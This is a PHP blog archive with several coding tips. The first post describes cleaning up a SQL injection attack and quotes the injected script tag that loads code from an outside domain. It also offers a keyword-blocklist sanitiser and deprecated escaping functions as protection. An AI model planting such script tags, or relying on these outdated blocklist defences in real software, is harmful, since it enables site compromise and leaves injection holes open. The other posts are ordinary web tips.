Archive for the “PHP” Category

The other day a Russian hacker made a mess of a site I manage. (I didn’t build the site, and I like to think that if I had, the attack would have been thwarted). Anyways the hacker used a method called SQL Injection where they take advantage of one of your submission forms to add extra SQL commands to their input and wreak havoc on your database.

In this particular instance the hacker added a JavaScript call into about every text and varchar field in the  entire database. (12 tables in all). Here is the offending code that was inserted into the fields:

<script src=http://www.jsportal.ru/page.js></script>

I don’t know what the Javascript does when loaded, but I am sure its not good news. FYI – here is an important tip for cleaning up your database: SQL Replace Function on a Text Field

Anyway, there are certainly other articles on how SQL Injections occur and how to prevent them, but here is a couple very useful functions that will greatly reduce your vulernability to SQL Injection if you apply it to any data that site users can submit to your site.

For ASP sites:

This one strips out single quotes, which are crucial to adding SQL commands:

<%

function stripQuotes(strWords)
stripQuotes = replace(strWords, “‘”, “””)
end function

%>

And this one strips out other naughty words that might destroy your database:

<%

function killChars(strWords)

dim badChars
dim newChars

badChars = array(“select”, “drop”, “;”, “–“, “insert”, “delete”, “xp_”)
newChars = strWords

for i = 0 to uBound(badChars)
newChars = replace(newChars, badChars(i), “”)
next

killChars = newChars

end function

%>

These aren’t the exact ones I use, but you get the idea. You can find the article where I got these ASP examples from here:

SQL Injection Attacks – Are You Safe?

For the PHP versions:

In PHP it is even easier. Just using this one function will help prevent many attacks:

mysql_real_escape_string($strWords);

This will strip out these harmful characters from the variable strWords:

  • \x00
  • \n
  • \r
  • \
  • \x1a

You can also use this to make sure inputs you expect to be numbers are actually numbers:

$strNumber= intval($strNumber);

Comments Comments Off on SQL Injection by jsportal.ru

Sometimes little tips can save a lot of time when it comes to programming.

This one is very handy, for when you find yourself having to grab some code you had written in regular html and change it to be called by a php echo statement.

When I had to do this in the past, I found the biggest time drain was escaping all the quotes (Otherwise the first quote in the html would stop the echo call prematurely.)

Well here is an incredibly easy way to avoid having to do that …. simply use single quotes to define your echo call and then your double quotes won’t break the php code.

For instance you have a simple linked image like this:

<a href=”http://www.link.com” target=”_top”><img src=”/image.gif”></a>

Normally you would have to escape all those quotes like this:

echo “<a href=\”http://www.link.com\” target=\”_top\”><img src=\”/image.gif\”</a>”;

Instead just use the single quotes like this:

echo ‘<a href=”http://www.link.com” target=”_top”><img src=”/image.gif”></a>’;

Comments Comments Off on Tired of escaping quotes in your php echo statements?

I learned a handy trick today. I wanted to provide an external javascript so other websites could display some info from my site, but then realized it would be way better if I could somehow have them call a php file instead. Well you can.

So the page call will look just like the typical javascript call, except we are calling a php file:

<script language=”JavaScript” type=”text/javascript” src=”http://www.yoursite.info/yourfile.php”></script>

Now since you are calling the php file this way you need to make the php file appear to be a javascript document so to do that you need to add a Header property like this:

Header(“content-type: application/x-javascript”);

Then you need to make sure your output is in javascript format, since that is what you are outputting. So lets look at an example php file might look like – you can use this to try it out:

<?
Header(“content-type: application/x-javascript”);
$testvar=”what’s up doc?”;
echo “document.write(\”Bugs Bunny says: <b>” . $testvar . “</b>\”)”;
?>

Then just call that file. Notice I am using php’s echo to write out the javascript code document.write – if were to just echo it it would not show up on the page calling the javascript.

Ok, now lets get even fancier. We can pass some parameters to our file in the page call:

<script language=”JavaScript” src=”http://www.yoursite.com/yourfile.php?var=elmerfudd&ID=4″></script>

Then you can pick up those parameters in your php file using $HTTP_GET_VARS[] and do whatever you want with them.

Comments 4 Comments »

I have always preferred including a menu file on my sites rather than repeating them on all the pages for the obvious reason that menu items sometimes change and it easier to change one file than change the links on all the pages that show that menu.

So anyway, recently I have also wanted to use CSS to highlight the active or current page the user is on using CSS, this is easy to do when the menu is on each page, but requires a little PHP when using a single menu included across your site.

So anyway here is my solution:

Here is the code for the navigation menu – I save this as a file called menu.php

<?php
$active[$current] = “class=active”;
?>

<ul>
<li <?php echo $active[1] ?>><a href=”index.php”>Home</a></li>
<li <?php echo $active[2] ?>><a href=”services.php”>services</a></li>
<li <?php echo $active[3] ?>><a href=”print.php”>print</a></li>
<li <?php echo $active[4] ?>><a href=”web.php”>web</a></li>
<li <?php echo $active[5] ?>><a href=”marketing.php”>marketing</a></li>
<li <?php echo $active[6] ?>><a href=”portfolio.php”>Portfolio</a></li>
<li <?php echo $active[7] ?>><a href=”contact.php”>Contact</a></li>
</ul>

Then, just include the menu on your pages and indicate which of the menu links you want to give the CSS style “active”:

<?php $current = 3; include(“menu.php”); ?>

Lastly, don’t forget to declare a visual style for the css class “active” to make the current page link stand out from the others.

VARIATION – You can also change the menu code slightly to make the active page not linkable at all – this will further make the current page stand out from the other menu options. Here is an example of the code you would use for the links:

<li <?php echo $active[1] ?>><?php if ($current != 1) { echo “<a href=\”index.php\”>home</a>”; } else { echo “home”; } ?></li>
<li <?php echo $active[2] ?>><?php if ($current != 2) { echo “<a href=\”web.php\”>web</a>”; } else { echo “web”; } ?></li>

Comments 2 Comments »